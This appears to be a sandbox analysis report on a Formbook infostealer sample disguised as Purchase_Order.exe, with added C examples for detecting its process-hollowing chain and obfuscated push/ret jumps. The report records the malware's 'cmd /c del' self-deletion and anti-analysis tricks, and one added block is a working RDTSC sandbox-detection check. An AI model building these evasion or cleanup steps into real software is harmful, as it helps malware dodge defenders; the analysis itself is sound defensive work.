            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FAA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FAA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FAB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FAA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FA9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D81C0 NtCreateFile,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D83A0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D8270 NtReadFile,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D82F0 NtClose,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D839A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D826A NtReadFile,
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D82EE NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0127B150 appears 72 times
            Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04F6B150 appears 136 times
            Source: Purchase_Order.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Purchase_Order.exe | Binary or memory string: OriginalFilename vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000002.271664791.0000000007F50000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameKygo.dll* vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000002.272587457.0000000008220000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000000.232767352.00000000005B6000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
            Source: Purchase_Order.exe, 00000000.00000002.271267830.0000000007EC0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase_Order.exe
            Source: Purchase_Order.exe | Binary or memory string: OriginalFilenameAsAnyMarshaler.exe6 vs Purchase_Order.exe
            Source: Purchase_Order.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Matched YARA rules (every source listed below matched both rules):
            Rule Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Rule Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, Formbook
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, Formbook
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, Formbook
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, Formbook
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, Formbook
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@13/10
            Source: C:\Users\user\Desktop\Purchase_Order.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase_Order.exe.log
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_01
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Mutant created: \Sessions\1\BaseNamedObjects\rjmTOaAYwV
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: Purchase_Order.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported twice)
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: Purchase_Order.exe | Virustotal: Detection: 20%
            Source: Purchase_Order.exe | ReversingLabs: Detection: 15%
            Source: C:\Users\user\Desktop\Purchase_Order.exe | File read: C:\Users\user\Desktop\Purchase_Order.exe:Zone.Identifier
            Source: unknown | Process created: C:\Users\user\Desktop\Purchase_Order.exe 'C:\Users\user\Desktop\Purchase_Order.exe'
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
            Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
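The process-creation lines above form the chain Purchase_Order.exe -> RegSvcs.exe (the hollowed host) -> explorer.exe -> systray.exe -> cmd.exe /c del RegSvcs.exe. The following is an added example, not code from the Joe Sandbox report, the sandbox or the malware, showing how the three parent/child relationships a detection engineer would key on can be written as rules over process events. The event list is constructed from the lines above, not collected live; the first rule generalizes this report's RegSvcs.exe case to any binary under C:\Windows\Microsoft.NET\Framework started with an empty command line from a user-profile path, which is an assumption of the example rather than something the report states.

```c
/* Added example: parent/child rules derived from the "Process created" lines
 * of this report. Not code from the report, the sandbox or the malware. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    const char *parent;   /* image path of the creating process ("unknown" if not observed) */
    const char *image;    /* image path of the created process */
    const char *cmdline;  /* command line of the created process as logged */
} ProcEvent;

/* Constructed from the report's process-creation lines (not live telemetry). */
static const ProcEvent EVENTS[] = {
    { "unknown",
      "C:\\Users\\user\\Desktop\\Purchase_Order.exe",
      "'C:\\Users\\user\\Desktop\\Purchase_Order.exe'" },
    { "C:\\Users\\user\\Desktop\\Purchase_Order.exe",
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe",
      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe" },
    { "C:\\Windows\\explorer.exe",
      "C:\\Windows\\SysWOW64\\systray.exe",
      "C:\\Windows\\SysWOW64\\systray.exe" },
    { "C:\\Windows\\SysWOW64\\systray.exe",
      "C:\\Windows\\SysWOW64\\cmd.exe",
      "/c del 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe'" },
    { "C:\\Windows\\SysWOW64\\cmd.exe",
      "C:\\Windows\\System32\\conhost.exe",
      "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" },
};
#define N_EVENTS (sizeof EVENTS / sizeof EVENTS[0])

enum { HIT_HOLLOW_HOST = 1, HIT_EXPLORER_SPAWN = 2, HIT_SELF_DELETE = 4 };

/* Windows paths are case-insensitive, so every comparison below is too. */
static int ieq_n(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++) {
        int ca = tolower((unsigned char)a[i]), cb = tolower((unsigned char)b[i]);
        if (ca != cb) return 0;
        if (ca == 0) return 1;
    }
    return 1;
}
static int iprefix(const char *s, const char *p) { return ieq_n(s, p, strlen(p)); }
static int ieq(const char *a, const char *b) { return ieq_n(a, b, strlen(a) + 1); }
static int icontains(const char *hay, const char *needle) {
    for (; *hay; hay++) if (iprefix(hay, needle)) return 1;
    return 0;
}
static const char *basename_of(const char *path) {
    const char *b = strrchr(path, '\\');
    return b ? b + 1 : path;
}

/* Flags for event idx; rule 3 looks back at earlier events in the same chain. */
unsigned classify_event(const ProcEvent *ev, size_t idx) {
    const ProcEvent *e = &ev[idx];
    unsigned hits = 0;

    /* 1. A .NET Framework utility started with no arguments by a binary in a
     *    user profile. The empty command line is the tell: RegSvcs.exe does
     *    nothing useful without one. (Generalized from this report's RegSvcs.exe.) */
    if (iprefix(e->parent, "C:\\Users\\") &&
        iprefix(e->image, "C:\\Windows\\Microsoft.NET\\Framework") &&
        ieq(e->cmdline, e->image))
        hits |= HIT_HOLLOW_HOST;

    /* 2. explorer.exe starting a 32-bit system binary with no arguments. */
    if (ieq(basename_of(e->parent), "explorer.exe") &&
        iprefix(e->image, "C:\\Windows\\SysWOW64\\") &&
        ieq(e->cmdline, e->image))
        hits |= HIT_EXPLORER_SPAWN;

    /* 3. cmd.exe deleting the image of a process created earlier in the chain. */
    if (ieq(basename_of(e->image), "cmd.exe") && icontains(e->cmdline, "del ")) {
        for (size_t j = 0; j < idx; j++)
            if (icontains(e->cmdline, ev[j].image)) { hits |= HIT_SELF_DELETE; break; }
    }
    return hits;
}

/* Union of all hits over a chain; 7 means all three rules fired. */
unsigned scan_events(const ProcEvent *ev, size_t n) {
    unsigned all = 0;
    for (size_t i = 0; i < n; i++) all |= classify_event(ev, i);
    return all;
}

int main(void) {
    for (size_t i = 0; i < N_EVENTS; i++) {
        unsigned h = classify_event(EVENTS, i);
        if (h) printf("event %zu: %s -> %s : flags 0x%x\n", i,
                      basename_of(EVENTS[i].parent), basename_of(EVENTS[i].image), h);
    }
    return 0;
}
```

Rule 3 is the one that ties the chain together: on its own a `cmd /c del` is noise, but a `del` whose target is the image of a process that the same chain created a moment earlier is the cleanup step of a hollowing loader.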
            Source: C:\Users\user\Desktop\Purchase_Order.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Purchase_Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Purchase_Order.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: Purchase_Order.exe | Static file information: File size 1532416 > 1048576
            Source: Purchase_Order.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x14da00
            Source: Purchase_Order.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Purchase_Order.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
            Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
            Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
            Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Code function: 0_2_004F73C3 push 0000006Fh; ret
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Code function: 0_2_004F67F4 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004160EF push ebp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00415250 push 00000036h; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004152DE push ebp; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041B3B5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041B46C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041B402 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041B40B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00414E67 pushfd; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012CD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_04FBD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D60EF push ebp; retf
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010DB3B5 push eax; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D5250 push 00000036h; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D52DE push ebp; retf
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010DB40B push eax; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010DB402 push eax; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010DB46C push eax; ret
            Source: C:\Windows\SysWOW64\systray.exe | Code function: 16_2_010D4E67 pushfd; retf
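The code-function lines above are the report's evidence for `push ...; ret` and `pushfd; retf` pairs: the pushed value becomes the return address, so the pair is an obfuscated jump rather than a real function return. As an added example, not code from the report, the sandbox or the sample, the scanner below finds such pairs in a byte buffer. The buffer is constructed for the example and contains the exact instruction pairs listed above (`push 6Fh; ret`, `push es; ret`, `push ebp; retf`, `push 36h; ret`, `push eax; ret`, `pushfd; retf`, `push ecx; ret`) between ordinary prologue and epilogue bytes; the opcode tables are standard 32-bit x86 encodings. A sliding byte scan like this does not respect instruction boundaries, so on a real section its hits need confirming against a disassembler before they are used for triage.

```c
/* Added example: byte-level scanner for push/ret and pushfd/retf pairs.
 * Not code from the report, the sandbox or the malware. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed sample: the pairs from the report's code-function lines,
 * embedded between ordinary prologue/epilogue bytes. Not bytes from the sample. */
static const uint8_t SAMPLE[] = {
    0x55, 0x8B, 0xEC,        /* +0  push ebp; mov ebp, esp  (normal prologue: 55 not followed by ret) */
    0x6A, 0x6F, 0xC3,        /* +3  push 6Fh; ret            (cf. 0_2_004F73C3) */
    0x90, 0x90,              /* +6  nop; nop */
    0x06, 0xC3,              /* +8  push es; ret             (cf. 0_2_004F67F4) */
    0x55, 0xCB,              /* +10 push ebp; retf           (cf. 4_2_004160EF) */
    0x8B, 0x45, 0x08,        /* +12 mov eax, [ebp+8] */
    0x6A, 0x36, 0xC3,        /* +15 push 36h; ret            (cf. 4_2_00415250) */
    0x50, 0xC3,              /* +18 push eax; ret            (cf. 4_2_0041B3B5) */
    0x9C, 0xCB,              /* +20 pushfd; retf             (cf. 4_2_00414E67) */
    0x51, 0xC3,              /* +22 push ecx; ret            (cf. 4_2_012CD0D1) */
    0x33, 0xC0, 0xC3,        /* +24 xor eax, eax; ret        (normal epilogue: no push before ret) */
};

/* Length of a push instruction starting at p (0 if none). Standard 32-bit x86 opcodes. */
static size_t push_len(const uint8_t *p, size_t avail) {
    if (avail < 1) return 0;
    uint8_t op = p[0];
    if (op >= 0x50 && op <= 0x57) return 1;                             /* push r32 */
    if (op == 0x06 || op == 0x0E || op == 0x16 || op == 0x1E) return 1; /* push es/cs/ss/ds */
    if (op == 0x9C) return 1;                                           /* pushfd */
    if (op == 0x6A) return avail >= 2 ? 2 : 0;                          /* push imm8 */
    if (op == 0x68) return avail >= 5 ? 5 : 0;                          /* push imm32 */
    return 0;
}

/* Length of a return instruction starting at p (0 if none). */
static size_t ret_len(const uint8_t *p, size_t avail) {
    if (avail < 1) return 0;
    if (p[0] == 0xC3 || p[0] == 0xCB) return 1;                         /* ret / retf */
    if ((p[0] == 0xC2 || p[0] == 0xCA) && avail >= 3) return 3;         /* ret imm16 / retf imm16 */
    return 0;
}

/* Record the offset of every push immediately followed by a return.
 * Returns the total count even when it exceeds max_hits. */
size_t find_push_ret(const uint8_t *buf, size_t len, size_t *hits, size_t max_hits) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        size_t pl = push_len(buf + i, len - i);
        if (pl == 0 || ret_len(buf + i + pl, len - i - pl) == 0) continue;
        if (n < max_hits) hits[n] = i;
        n++;
    }
    return n;
}

/* Convenience wrapper over the constructed sample. */
size_t sample_hit_count(void) {
    size_t hits[32];
    return find_push_ret(SAMPLE, sizeof SAMPLE, hits, 32);
}

int main(void) {
    size_t hits[32];
    size_t n = find_push_ret(SAMPLE, sizeof SAMPLE, hits, 32);
    for (size_t i = 0; i < n && i < 32; i++) {
        const uint8_t *p = SAMPLE + hits[i];
        size_t pl = push_len(p, sizeof SAMPLE - hits[i]);
        size_t rl = ret_len(p + pl, sizeof SAMPLE - hits[i] - pl);
        printf("+%zu:", hits[i]);
        for (size_t k = 0; k < pl + rl; k++) printf(" %02X", p[k]);
        printf("\n");
    }
    printf("%zu push/ret pairs\n", n);
    return 0;
}
```

A real function prologue (`push ebp; mov ebp, esp`) and epilogue (`xor eax, eax; ret`) are left unflagged, which is the point: only a push whose very next instruction is a return is a disguised branch.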
            Source: initial sample | Static PE information: section name: .text entropy: 7.38800218232
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Process information set: NOOPENFILEERRORBOX (reported 47 times)
            Source: C:\Windows\SysWOW64\systray.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Purchase_Order.exe PID: 1528, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 00000000010C85E4 second address: 00000000010C85EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 00000000010C897E second address: 00000000010C8984 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004088B0 rdtsc
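The interceptor lines above record the exact sequence the sandbox hooked: `rdtsc`, `xor ecx, ecx`, `add ecx, eax` (keep the low 32 bits of the first reading), `rdtsc` (second reading). The report does not show what the sample does with the difference. The block below is an added example, not the sample's or the sandbox's code, that reproduces the sequence in GCC inline assembly to show why it works as an anti-analysis check: two back-to-back reads cost tens of cycles on bare metal, but thousands when a hypervisor traps RDTSC or an analysis tool single-steps or emulates it, which is exactly the situation the "RDTSC instruction interceptor" lines describe from the sandbox's side. The 1000-cycle threshold and the use of the minimum over several probes are assumptions of this example, not values taken from the sample; on non-x86 hosts the block falls back to CLOCK_MONOTONIC, so the numbers there are nanoseconds rather than cycles.

```c
/* Added example: the rdtsc / xor ecx,ecx / add ecx,eax / rdtsc sequence from
 * the report, reproduced to show the timing check it implements. Not code
 * from the sample or the sandbox. Threshold and sampling are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* One probe: (second reading - first reading), low 32 bits, exactly as the
 * intercepted sequence leaves them in eax and ecx. */
static uint32_t probe_delta(void) {
#if defined(__x86_64__) || defined(__i386__)
    uint32_t first_lo, second_lo;
    __asm__ volatile(
        "rdtsc\n\t"                /* edx:eax = TSC (first reading) */
        "xor %%ecx, %%ecx\n\t"     /* ecx = 0 */
        "add %%eax, %%ecx\n\t"     /* ecx = low 32 bits of the first reading */
        "rdtsc\n\t"                /* edx:eax = TSC (second reading) */
        : "=c"(first_lo), "=a"(second_lo)
        :
        : "edx");
    return second_lo - first_lo;   /* unsigned wrap keeps this right across a 32-bit rollover */
#else
    /* Fallback for non-x86 hosts (assumption of this example): nanoseconds, not cycles. */
    struct timespec t0, t1;
    clock_gettime(CLOCK_MONOTONIC, &t0);
    clock_gettime(CLOCK_MONOTONIC, &t1);
    return (uint32_t)((t1.tv_sec - t0.tv_sec) * 1000000000L + (t1.tv_nsec - t0.tv_nsec));
#endif
}

/* Minimum delta over several probes: interrupts and context switches only make
 * a probe slower, so the minimum is the cleanest estimate of the true cost. */
uint32_t min_probe_delta(int samples) {
    uint32_t best = UINT32_MAX;
    for (int i = 0; i < samples; i++) {
        uint32_t d = probe_delta();
        if (d < best) best = d;
    }
    return best;
}

/* Decision rule: 1 if the measured cost exceeds the threshold (RDTSC trapped,
 * single-stepped or emulated), 0 otherwise. The threshold is a parameter;
 * 1000 cycles is the assumed value used in main() below. */
int rdtsc_looks_instrumented(uint32_t delta, uint32_t threshold) {
    return delta > threshold;
}

int main(void) {
    uint32_t d = min_probe_delta(64);
    printf("min back-to-back rdtsc delta: %u\n", d);
    printf("verdict: %s\n", rdtsc_looks_instrumented(d, 1000) ? "instrumented/trapped" : "native");
    return 0;
}
```

From the defender's side this is why a sandbox that hooks RDTSC at the instruction level, as the interceptor lines show, should also return a plausible, advancing counter rather than the real one: the check compares two reads of the same counter, so the hook itself is what inflates the gap.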
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time (69 further entries, descending): 240000, 239844, 239656, 239531, 239422, 239313, 239188, 239000, 238891, 238750, 238641, 238516, 238406, 238297, 238188, 238063, 237953, 237828, 237719, 237563, 237453, 237344, 237219, 237110, 236953, 236844, 236735, 236610, 236469, 236360, 236203, 236094, 235985, 235860, 235735, 235610, 235485, 235360, 235235, 235110, 234953, 234828, 234703, 234594, 234453, 234313, 234188, 234047, 233906, 233781, 233641, 233516, 233375, 233266, 233141, 233016, 232906, 232797, 232688, 232563, 232438, 232313, 232203, 232078, 231953, 231828, 231719, 231594, 231469
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Window / User API: threadDelayed 2691
            Source: C:\Users\user\Desktop\Purchase_Order.exe | Window / User API: threadDelayed 5275
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239844s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239656s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239531s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239422s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239313s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239188s >= -30000s
